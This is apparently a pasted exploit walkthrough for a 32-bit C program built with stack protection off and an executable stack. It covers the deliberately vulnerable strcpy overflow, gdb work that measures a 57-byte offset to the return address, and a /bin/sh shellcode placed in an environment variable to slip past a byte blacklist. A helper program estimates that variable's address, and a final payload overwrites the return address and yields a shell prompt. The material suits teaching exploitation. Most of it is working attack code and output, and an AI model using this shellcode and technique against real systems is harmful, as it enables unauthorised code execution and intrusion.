Combreal

BOF_using_environment_variable

Aug 10th, 2020
  1. /////BOF environment variable
  2.  
  3.  
  4. bin02.c
  5. #include <stdio.h>
  6. #include <string.h>
  7.  
/*
 * Copies `texte` into a fixed 45-byte stack buffer with strcpy() and prints it.
 *
 * This is the deliberately vulnerable routine of the exercise: strcpy() never
 * consults sizeof buffer, so any `texte` longer than 44 bytes plus the
 * terminator writes past `buffer` into the rest of the frame. The disassembly
 * further down places `buffer` at ebp-0x35, and the gdb session measures 57
 * bytes between the buffer and the slot holding the saved return address
 * (0x08048533, the instruction after the call in main). The bounded
 * equivalent would be `snprintf(buffer, sizeof buffer, "%s", texte);`.
 *
 * Declared `int` but falls off the end without a return statement (UB if the
 * value were used; main() discards it).
 */
int protect_affiche(char *texte)
{
        char buffer[45];
        strcpy(buffer, texte);   /* unbounded copy: the overflow point */
        printf("%s\n",buffer);
}
  14.  
/*
 * Entry point: refuses argv[1] if it contains any byte listed in `interdit`,
 * otherwise passes it to protect_affiche().
 *
 * The check is a byte-level blacklist applied to argv[1] only. It is not a
 * memory-safety mitigation: the unbounded strcpy() in protect_affiche() is
 * untouched, and nothing here inspects other attacker-controlled input such
 * as the environment, which is why the rest of this note can still deliver a
 * payload. Returns 1 on bad usage or when a blacklisted byte is found, else 0.
 */
int main(int argc, char ** argv)
{
        /* Blacklisted bytes, NUL-terminated so the inner loop can walk it like
         * a string. Values >= 0x80 stored in a plain char are
         * implementation-defined (typically signed on x86); argv[1][i] is also
         * a char, so the comparison below is at least consistent. */
        char interdit[]={0x89,0x90,0x99,0x80,0xc0,0xe1,0xb0,0x00};
        int i,j;
        if (argc!=2)
        {
                printf("Usage: %s <texte>\n", argv[0]);
                return 1;
        }
        /* Scan every byte of argv[1] against every blacklisted byte. */
        for(i=0;argv[1][i];i++)
        {
                for(j=0;interdit[j];j++)
                {
                        if(argv[1][i] == interdit[j])
                        {
                                printf("Detection shellcode !\n");
                                return 1;
                        }
                }
        }
        protect_affiche(argv[1]);
        return 0;
}
  38.  
  39. gcc -m32 -fno-stack-protector -z execstack bin02.c -o bin02
  40.  
  41. peda bin02
  42. disass main
  43. 0x08048459 <+0>:     push   ebp
  44.    0x0804845a <+1>:     mov    ebp,esp
  45.    0x0804845c <+3>:     and    esp,0xfffffff0
  46.    0x0804845f <+6>:     sub    esp,0x20
  47.    0x08048462 <+9>:     mov    BYTE PTR [esp+0x10],0x89
  48.    0x08048467 <+14>:    mov    BYTE PTR [esp+0x11],0x90
  49.    0x0804846c <+19>:    mov    BYTE PTR [esp+0x12],0x99
  50.    0x08048471 <+24>:    mov    BYTE PTR [esp+0x13],0x80
  51.    0x08048476 <+29>:    mov    BYTE PTR [esp+0x14],0xc0
  52.    0x0804847b <+34>:    mov    BYTE PTR [esp+0x15],0xe1
  53.    0x08048480 <+39>:    mov    BYTE PTR [esp+0x16],0xb0
  54.    0x08048485 <+44>:    mov    BYTE PTR [esp+0x17],0x0
  55.    0x0804848a <+49>:    cmp    DWORD PTR [ebp+0x8],0x2
  56.    0x0804848e <+53>:    je     0x80484b0 <main+87>
  57.    0x08048490 <+55>:    mov    eax,DWORD PTR [ebp+0xc]
  58.    0x08048493 <+58>:    mov    edx,DWORD PTR [eax]
  59.    0x08048495 <+60>:    mov    eax,0x8048600
  60.    0x0804849a <+65>:    mov    DWORD PTR [esp+0x4],edx
  61.    0x0804849e <+69>:    mov    DWORD PTR [esp],eax
  62.    0x080484a1 <+72>:    call   0x8048354 <printf@plt>
  63.    0x080484a6 <+77>:    mov    eax,0x1
  64.    0x080484ab <+82>:    jmp    0x8048538 <main+223>
  65.    0x080484b0 <+87>:    mov    DWORD PTR [esp+0x18],0x0
  66.    0x080484b8 <+95>:    jmp    0x804850d <main+180>
  67.    0x080484ba <+97>:    mov    DWORD PTR [esp+0x1c],0x0
  68.    0x080484c2 <+105>:   jmp    0x80484fb <main+162>
  69.    0x080484c4 <+107>:   mov    eax,DWORD PTR [ebp+0xc]
  70.    0x080484c7 <+110>:   add    eax,0x4
  71.    0x080484ca <+113>:   mov    edx,DWORD PTR [eax]
  72.    0x080484cc <+115>:   mov    eax,DWORD PTR [esp+0x18]
  73.    0x080484d0 <+119>:   lea    eax,[edx+eax*1]
  74.    0x080484d3 <+122>:   movzx  edx,BYTE PTR [eax]
  75.    0x080484d6 <+125>:   mov    eax,DWORD PTR [esp+0x1c]
  76.    0x080484da <+129>:   movzx  eax,BYTE PTR [esp+eax*1+0x10]
  77.    0x080484df <+134>:   cmp    dl,al
  78.    0x080484e1 <+136>:   jne    0x80484f6 <main+157>
  79.    0x080484e3 <+138>:   mov    DWORD PTR [esp],0x8048613
  80.    0x080484ea <+145>:   call   0x8048364 <puts@plt>
  81.    0x080484ef <+150>:   mov    eax,0x1
  82.    0x080484f4 <+155>:   jmp    0x8048538 <main+223>
  83.    0x080484f6 <+157>:   add    DWORD PTR [esp+0x1c],0x1
  84.    0x080484fb <+162>:   mov    eax,DWORD PTR [esp+0x1c]
  85.    0x080484ff <+166>:   movzx  eax,BYTE PTR [esp+eax*1+0x10]
  86.    0x08048504 <+171>:   test   al,al
  87.    0x08048506 <+173>:   jne    0x80484c4 <main+107>
  88.    0x08048508 <+175>:   add    DWORD PTR [esp+0x18],0x1
  89.    0x0804850d <+180>:   mov    eax,DWORD PTR [ebp+0xc]
  90.    0x08048510 <+183>:   add    eax,0x4
  91.    0x08048513 <+186>:   mov    edx,DWORD PTR [eax]
  92.    0x08048515 <+188>:   mov    eax,DWORD PTR [esp+0x18]
  93.    0x08048519 <+192>:   lea    eax,[edx+eax*1]
  94.    0x0804851c <+195>:   movzx  eax,BYTE PTR [eax]
  95.    0x0804851f <+198>:   test   al,al
  96.    0x08048521 <+200>:   jne    0x80484ba <main+97>
  97.    0x08048523 <+202>:   mov    eax,DWORD PTR [ebp+0xc]
  98.    0x08048526 <+205>:   add    eax,0x4
  99.    0x08048529 <+208>:   mov    eax,DWORD PTR [eax]
  100.    0x0804852b <+210>:   mov    DWORD PTR [esp],eax
  101.    0x0804852e <+213>:   call   0x8048434 <protect_affiche>
  102.    0x08048533 <+218>:   mov    eax,0x0
  103.    0x08048538 <+223>:   leave
  104.    0x08048539 <+224>:   ret
  105. disass protect_affiche
  106. 0x08048434 <+0>:     push   ebp
  107.    0x08048435 <+1>:     mov    ebp,esp
  108.    0x08048437 <+3>:     sub    esp,0x48
  109.    0x0804843a <+6>:     mov    eax,DWORD PTR [ebp+0x8]
  110.    0x0804843d <+9>:     mov    DWORD PTR [esp+0x4],eax
  111.    0x08048441 <+13>:    lea    eax,[ebp-0x35]
  112.    0x08048444 <+16>:    mov    DWORD PTR [esp],eax
  113.    0x08048447 <+19>:    call   0x8048344 <strcpy@plt>
  114.    0x0804844c <+24>:    lea    eax,[ebp-0x35]
  115.    0x0804844f <+27>:    mov    DWORD PTR [esp],eax
  116.    0x08048452 <+30>:    call   0x8048364 <puts@plt>
  117.    0x08048457 <+35>:    leave
  118.    0x08048458 <+36>:    ret
  119. b *0x08048434
  120. b *0x08048447
  121. r toto
  122. x/wx $esp
  123.    0xbffffbfc:     0x08048533
  124. c
  125. dumpargs
  126.    Guessed arguments:
  127.    arg[0]: 0xbffffbc3 --> 0xfffbf6b7
  128.    arg[1]: 0xbffffe0d ("toto")
  129. p/d 0xbffffbfc-0xbffffbc3
  130.    $1 = 57
  131. q
  132.  
  133.  
  134. export SHELLCODE=$(python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"')
  135.  
  136.  
  137. nano getenvvar.c
  138. #include <stdio.h>
  139. #include <stdlib.h>
  140. #include <string.h>
  141.  
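/*
 * Prints an estimate of where environment variable argv[1] will sit on the
 * stack of the program named argv[2].
 *
 * Returns EXIT_SUCCESS after printing the estimate; exits with EXIT_FAILURE
 * on bad usage or when the variable is not set in this process's environment.
 */
int main(int argc, char *argv[]) {
    if(argc < 3) {
        printf("Usage: %s <environment variable> <target name program>\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    char *ptr = getenv(argv[1]); /* get env var location in this process */
    if (ptr == NULL) {
        /* getenv() returns NULL for an unset variable; without this check the
         * adjustment below would do pointer arithmetic on NULL and print a
         * meaningless address. */
        fprintf(stderr, "%s is not set in the environment\n", argv[1]);
        exit(EXIT_FAILURE);
    }

    /* Heuristic, not a guarantee: the environment block is laid out above the
     * program name on the stack, so a target whose name length differs from
     * argv[0] shifts it. The factor 2 presumably reflects the name being
     * stored twice at the top of the stack — confirm against the target's
     * actual layout. The result is only printed, never dereferenced. */
    ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */

    printf("%s will be at %p\n", argv[1], (void *)ptr); /* %p expects void * */

    return EXIT_SUCCESS;
}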
  157.  
  158. gcc -m32 getenvvar.c -o getenvvar
  159.  
  160. ./getenvvar SHELLCODE bin02
  161.    SHELLCODE will be at 0xbffffe1f
  162.  
  163. ./bin02 $(python -c 'print "A"*57 + "\x1f\xfe\xff\xbf"')
  164. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA#▒▒▒
  165. $